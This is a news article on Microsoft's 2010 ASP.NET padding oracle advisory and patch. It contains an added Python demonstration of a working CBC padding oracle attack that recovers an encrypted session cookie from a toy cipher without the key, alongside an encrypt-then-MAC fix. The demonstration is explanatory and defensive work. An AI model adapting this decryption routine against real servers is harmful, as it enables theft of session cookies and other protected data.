On September 17th Microsoft put out an advisory for ASP.NET warning that it could be exploited to allow information disclosure. ASP.NET is a development framework used to create websites and applications, and the flaw is in its encryption scheme: a "padding oracle", where the framework's different responses to a ciphertext that decrypts to valid padding and one that does not let an attacker decrypt data without the key. The flaw got an Important rating from Microsoft because sensitive information could be obtained by unauthorized parties if ASP.NET sites used cryptography in certain ways. In reality nearly all ASP.NET sites suffer from the problem, because a range of commonly used built-in features (view state, forms authentication tickets and the encrypted resource handlers among them) rely on the affected code.
This vulnerability is being actively exploited, and PC World reports the extent of the possible damage:
The fix addresses a vulnerability in ASP.Net’s encryption that attackers could abuse to access Web applications with full administrator rights; decrypt session cookies or other encrypted data on a remote server; and access and snatch files from sites or Web applications.
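To make concrete what "decrypt session cookies or other encrypted data on a remote server" means for a padding oracle, here is an added demonstration that is not code from the original article and not ASP.NET's own implementation. It stands in a 16-byte Feistel cipher built from SHA-256 for AES so it runs with the Python standard library alone; the attack logic is the same for any CBC-mode cipher whose decryptor reveals whether the padding check passed. The secret string, the toy cipher and all function names are constructed for this example. The hardened variant at the end shows the shape of the fix (authenticate the ciphertext before decrypting, and report every failure identically), not Microsoft's actual patch.

```python
import hashlib
import hmac
import os

BLOCK = 16  # block size in bytes, as for AES


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(half: bytes, key: bytes, r: int) -> bytes:
    # Round function of the toy cipher (constructed stand-in for AES).
    return hashlib.sha256(key + bytes([r]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(r, key, i))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(l, key, i)), l
    return l + r


def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the distinguishable error is the oracle
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return unpad(out)


def make_padding_oracle(key: bytes):
    """A server that leaks 'was the padding valid?' and nothing else."""
    def oracle(iv: bytes, ct: bytes) -> bool:
        try:
            cbc_decrypt(key, iv, ct)
            return True
        except ValueError:
            return False
    return oracle


def recover_block(oracle, prev: bytes, block: bytes) -> bytes:
    """Recover one plaintext block with oracle queries only (no key)."""
    inter = bytearray(BLOCK)  # block_decrypt(key, block), learned byte by byte
    for padv in range(1, BLOCK + 1):
        pos = BLOCK - padv
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ padv  # force trailing bytes to decrypt to padv
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), block):
                continue
            if padv == 1:  # rule out an accidental longer valid padding
                check = bytearray(forged)
                check[pos - 1] ^= 0xFF
                if not oracle(bytes(check), block):
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            raise RuntimeError("oracle never accepted a forged block")
    return _xor(bytes(inter), prev)


def padding_oracle_attack(oracle, iv: bytes, ct: bytes) -> bytes:
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    plain = b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                     for i in range(1, len(blocks)))
    return unpad(plain)


def make_hardened_oracle(key: bytes, mac_key: bytes):
    """Encrypt-then-MAC: forged ciphertexts are rejected before the padding
    check runs, and every failure looks the same to the client."""
    def oracle(iv: bytes, ct: bytes, tag: bytes = b"") -> bool:
        expected = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            return False
        try:
            cbc_decrypt(key, iv, ct)
            return True
        except ValueError:
            return False
    return oracle


def demo(secret: bytes = b"sessionid=42;role=admin") -> bytes:
    """Encrypt a constructed secret, then recover it through the oracle."""
    key, iv = os.urandom(16), os.urandom(16)
    ct = cbc_encrypt(key, iv, pad(secret))
    return padding_oracle_attack(make_padding_oracle(key), iv, ct)


def demo_hardened(secret: bytes = b"sessionid=42;role=admin") -> bool:
    """True when the genuine ciphertext is accepted but the attack fails."""
    key, mac_key, iv = os.urandom(16), os.urandom(16), os.urandom(16)
    ct = cbc_encrypt(key, iv, pad(secret))
    oracle = make_hardened_oracle(key, mac_key)
    if not oracle(iv, ct, hmac.new(mac_key, iv + ct, hashlib.sha256).digest()):
        return False
    try:
        padding_oracle_attack(oracle, iv, ct)
    except RuntimeError:
        return True
    return False


if __name__ == "__main__":
    print(demo())            # the "secret" comes back without the key
    print(demo_hardened())   # True: the same attack fails against the MAC'd server
```

The attack needs at most 256 queries per plaintext byte, so a two-block cookie falls in a few thousand requests; on a real server the "oracle" is simply the difference between the error page returned for a padding failure and the one returned for any other failure, which is why the workaround Microsoft suggested was to make every error response identical.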
Since news of the exploit came out web admins have been applying workarounds to limit the problem. Now, according to PC World, Microsoft released an out-of-band patch yesterday to fix the bug. The problem doesn't affect everybody: the people most interested in getting this fix are those that run web servers, meaning web admins, large enterprises and hosting providers. The patch is not on Windows Update yet, so it must be downloaded manually. The reason for this is that the people most concerned with fixing the bug will often not use Windows Update and instead have their own patch testing methodology.
The bulletin for the patch can be seen here. The patch covers the .NET Framework on all supported Windows versions from XP SP3 and Server 2003 through Windows 7 and Server 2008 R2. The next scheduled Patch Tuesday will be October 12.